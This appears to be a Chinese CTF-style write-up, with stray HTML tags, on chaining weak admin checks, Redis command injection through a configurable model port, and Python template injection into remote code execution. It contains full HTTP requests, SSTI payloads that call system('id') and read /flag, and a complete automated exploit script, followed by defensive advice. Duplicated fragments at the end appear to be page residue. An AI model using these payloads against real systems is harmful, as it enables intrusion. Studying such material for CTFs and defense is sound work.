Redis下的Python模板魔术方法攻击分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析了一种结合Redis未授权访问与Python模板注入的安全漏洞，通过伪造管理员会话、操纵Redis数据以及利用模板渲染机制，最终实现远程代码执行并获取系统敏感信息。<\/p>

漏洞环境分析<\/h2>

关键文件结构<\/h3>

app.py          # 主应用程序文件，包含所有路由和业务逻辑
<\/code><\/pre>
核心漏洞点<\/h3>

管理员权限伪造漏洞<\/li>
Redis命令注入漏洞<\/li>
Python模板渲染漏洞<\/li>
<\/ol>
漏洞利用步骤详解<\/h2>
第一步：普通用户注册与登录<\/h3>

注册一个普通用户账户<\/li>
登录获取有效会话(Session)<\/li>
<\/ol>
# 示例注册请求<\/span>
<\/span><\/span>POST \/<\/span>register HTTP\/<\/span>1.1<\/span>
<\/span><\/span>Host: target.<\/span>com
<\/span><\/span>Content-<\/span>Type: application\/<\/span>x-<\/span>www-<\/span>form-<\/span>urlencoded
<\/span><\/span>
<\/span><\/span>username=<\/span>attacker&<\/span>password=<\/span>123456<\/span>
<\/span><\/span><\/code><\/pre>第二步：伪造管理员权限<\/h3>
审计发现\/admin<\/code>路由仅检查session中的user<\/code>字段是否为空，没有验证用户权限级别：<\/p>
@app<\/span>.<\/span>route('\/admin'<\/span>)
<\/span><\/span>def<\/span> admin<\/span>():
<\/span><\/span>    if<\/span> 'user'<\/span> not<\/span> in<\/span> session:
<\/span><\/span>        return<\/span> redirect('\/login'<\/span>)
<\/span><\/span>    # 缺少权限验证<\/span>
<\/span><\/span>    return<\/span> render_template('admin.html'<\/span>)
<\/span><\/span><\/code><\/pre>利用方法：<\/p>

获取普通用户的有效session<\/li>
在请求中添加X-Forwarded-For<\/code>或类似头字段伪造管理员身份<\/li>
<\/ol>
第三步：操纵模型端口配置<\/h3>
访问\/admin\/model_ports<\/code>路由，该功能允许为模型定义端口：<\/p>
@app<\/span>.<\/span>route('\/admin\/model_ports'<\/span>, methods=<\/span>['POST'<\/span>])
<\/span><\/span>def<\/span> model_ports<\/span>():
<\/span><\/span>    model_id =<\/span> request.<\/span>form.<\/span>get('model_id'<\/span>)
<\/span><\/span>    port =<\/span> request.<\/span>form.<\/span>get('port'<\/span>)
<\/span><\/span>    # 将模型ID与端口关联存储<\/span>
<\/span><\/span>    # 无端口类型验证，可设置为Redis端口(通常6379)<\/span>
<\/span><\/span><\/code><\/pre>攻击操作：<\/p>

设置模型ID为test<\/code><\/li>
将端口设置为Redis服务端口(如6379)<\/li>
<\/ol>
POST \/<\/span>admin\/<\/span>model_ports HTTP\/<\/span>1.1<\/span>
<\/span><\/span>Host: target.<\/span>com
<\/span><\/span>Cookie: session=<<\/span>普通用户session><\/span>
<\/span><\/span>Content-<\/span>Type: application\/<\/span>x-<\/span>www-<\/span>form-<\/span>urlencoded
<\/span><\/span>
<\/span><\/span>model_id=<\/span>test&<\/span>port=<\/span>6379<\/span>
<\/span><\/span><\/code><\/pre>第四步：Redis命令注入<\/h3>
通过\/admin\/raw_ask<\/code>路由与配置的"模型"通信，实际上是与Redis服务交互：<\/p>
@app<\/span>.<\/span>route('\/admin\/raw_ask'<\/span>, methods=<\/span>['POST'<\/span>])
<\/span><\/span>def<\/span> raw_ask<\/span>():
<\/span><\/span>    model_id =<\/span> request.<\/span>form.<\/span>get('model_id'<\/span>)
<\/span><\/span>    query =<\/span> request.<\/span>form.<\/span>get('query'<\/span>)
<\/span><\/span>    # 获取模型配置的端口<\/span>
<\/span><\/span>    port =<\/span> get_model_port(model_id)
<\/span><\/span>    # 直接与指定端口建立连接并发送查询<\/span>
<\/span><\/span>    response =<\/span> send_to_port(port, query)
<\/span><\/span>    return<\/span> response
<\/span><\/span><\/code><\/pre>利用方法：<\/p>

通过该接口发送Redis命令<\/li>
设置恶意的Redis键值对<\/li>
<\/ol>
POST \/<\/span>admin\/<\/span>raw_ask HTTP\/<\/span>1.1<\/span>
<\/span><\/span>Host: target.<\/span>com
<\/span><\/span>Cookie: session=<<\/span>普通用户session><\/span>
<\/span><\/span>Content-<\/span>Type: application\/<\/span>x-<\/span>www-<\/span>form-<\/span>urlencoded
<\/span><\/span>
<\/span><\/span>model_id=<\/span>test&<\/span>query=<\/span>SET prompt:math-<\/span>v1 "{{ ''.__class__.__mro__[1].__subclasses__() }}"<\/span>
<\/span><\/span><\/code><\/pre>第五步：触发模板渲染漏洞<\/h3>
\/ask<\/code>路由存在模板渲染漏洞：<\/p>
@app<\/span>.<\/span>route('\/ask'<\/span>)
<\/span><\/span>def<\/span> ask<\/span>():
<\/span><\/span>    query =<\/span> request.<\/span>args.<\/span>get('q'<\/span>, ''<\/span>)
<\/span><\/span>    # 首先尝试从Redis获取模板<\/span>
<\/span><\/span>    template =<\/span> redis.<\/span>get('prompt:math-v1'<\/span>)
<\/span><\/span>    if<\/span> template:
<\/span><\/span>        # 直接渲染Redis中的值，无安全过滤<\/span>
<\/span><\/span>        return<\/span> render_template_string(template)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        # 从文件系统读取模板<\/span>
<\/span><\/span>        return<\/span> render_template('default_prompt.html'<\/span>)
<\/span><\/span><\/code><\/pre>利用方法：<\/p>

访问\/ask<\/code>路由触发模板渲染<\/li>
系统会渲染我们通过Redis注入的恶意模板<\/li>
<\/ol>
GET \/<\/span>ask?<\/span>q=<\/span>anything HTTP\/<\/span>1.1<\/span>
<\/span><\/span>Host: target.<\/span>com
<\/span><\/span><\/code><\/pre>第六步：利用Python魔术方法获取系统权限<\/h3>
通过模板注入执行Python代码：<\/p>

访问对象类层次结构：<\/li>
<\/ol>
{{ ''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__() }}
<\/span><\/span><\/code><\/pre>
查找并利用危险子类（如os._wrap_close<\/code>）：<\/li>
<\/ol>
{{ ''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[133<\/span>].<\/span>__init__.<\/span>__globals__['system'<\/span>]('id'<\/span>) }}
<\/span><\/span><\/code><\/pre>
获取flag：<\/li>
<\/ol>
{{ config.<\/span>__class__.<\/span>__init__.<\/span>__globals__['os'<\/span>].<\/span>popen('cat \/flag'<\/span>).<\/span>read() }}
<\/span><\/span><\/code><\/pre>自动化攻击脚本<\/h2>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>TARGET =<\/span> "http:\/\/target.com"<\/span>
<\/span><\/span>
<\/span><\/span># 1. 注册普通用户<\/span>
<\/span><\/span>session =<\/span> requests.<\/span>Session()
<\/span><\/span>register_data =<\/span> {"username"<\/span>: "attacker"<\/span>, "password"<\/span>: "123456"<\/span>}
<\/span><\/span>session.<\/span>post(f<\/span>"<\/span>{<\/span>TARGET}<\/span>\/register"<\/span>, data=<\/span>register_data)
<\/span><\/span>
<\/span><\/span># 2. 登录获取session<\/span>
<\/span><\/span>login_data =<\/span> {"username"<\/span>: "attacker"<\/span>, "password"<\/span>: "123456"<\/span>}
<\/span><\/span>session.<\/span>post(f<\/span>"<\/span>{<\/span>TARGET}<\/span>\/login"<\/span>, data=<\/span>login_data)
<\/span><\/span>
<\/span><\/span># 3. 配置恶意模型端口<\/span>
<\/span><\/span>model_port_data =<\/span> {"model_id"<\/span>: "test"<\/span>, "port"<\/span>: "6379"<\/span>}
<\/span><\/span>session.<\/span>post(f<\/span>"<\/span>{<\/span>TARGET}<\/span>\/admin\/model_ports"<\/span>, data=<\/span>model_port_data)
<\/span><\/span>
<\/span><\/span># 4. 注入恶意Redis数据<\/span>
<\/span><\/span>redis_payload =<\/span> {
<\/span><\/span>    "model_id"<\/span>: "test"<\/span>,
<\/span><\/span>    "query"<\/span>: "SET prompt:math-v1 <\/span>\"<\/span>{{ ''.__class__.__mro__[1].__subclasses__()[133].__init__.__globals__['system']('cat \/flag') }}<\/span>\"<\/span>"<\/span>
<\/span><\/span>}
<\/span><\/span>session.<\/span>post(f<\/span>"<\/span>{<\/span>TARGET}<\/span>\/admin\/raw_ask"<\/span>, data=<\/span>redis_payload)
<\/span><\/span>
<\/span><\/span># 5. 触发模板渲染<\/span>
<\/span><\/span>response =<\/span> session.<\/span>get(f<\/span>"<\/span>{<\/span>TARGET}<\/span>\/ask?q=anything"<\/span>)
<\/span><\/span>print(response.<\/span>text)  # 包含flag内容<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>


权限验证<\/strong>：<\/p>

实施严格的权限检查，区分普通用户和管理员<\/li>
使用角色基础的访问控制(RBAC)<\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

验证模型端口应为合法应用端口<\/li>
限制Redis命令执行权限<\/li>
<\/ul>
<\/li>

模板安全<\/strong>：<\/p>

使用安全的模板渲染方式<\/li>
禁用或严格过滤模板中的Python表达式<\/li>
<\/ul>
<\/li>

Redis安全<\/strong>：<\/p>

实施Redis认证<\/li>
限制Redis绑定IP<\/li>
使用不同权限级别的Redis用户<\/li>
<\/ul>
<\/li>

会话安全<\/strong>：<\/p>

在会话中添加权限级别标识<\/li>
实施CSRF保护<\/li>
<\/ul>
<\/li>
<\/ol>
通过以上分析，我们可以看到多个安全漏洞的连锁反应导致了严重的系统入侵风险。在实际开发中，应当对每个功能点进行严格的安全审查，避免此类漏洞的产生。<\/p>

Redis下的Python模板魔术方法攻击分析与利用<\/h1>

漏洞概述<\/h2> 本文详细分析了一种结合Redis未授权访问与Python模板注入的安全漏洞，通过伪造管理员会话、操纵Redis数据以及利用模板渲染机制，最终实现远程代码执行并获取系统敏感信息。<\/p>

漏洞环境分析<\/h2>

漏洞利用步骤详解<\/h2>

漏洞概述<\/h2>
本文详细分析了一种结合Redis未授权访问与Python模板注入的安全漏洞，通过伪造管理员会话、操纵Redis数据以及利用模板渲染机制，最终实现远程代码执行并获取系统敏感信息。<\/p>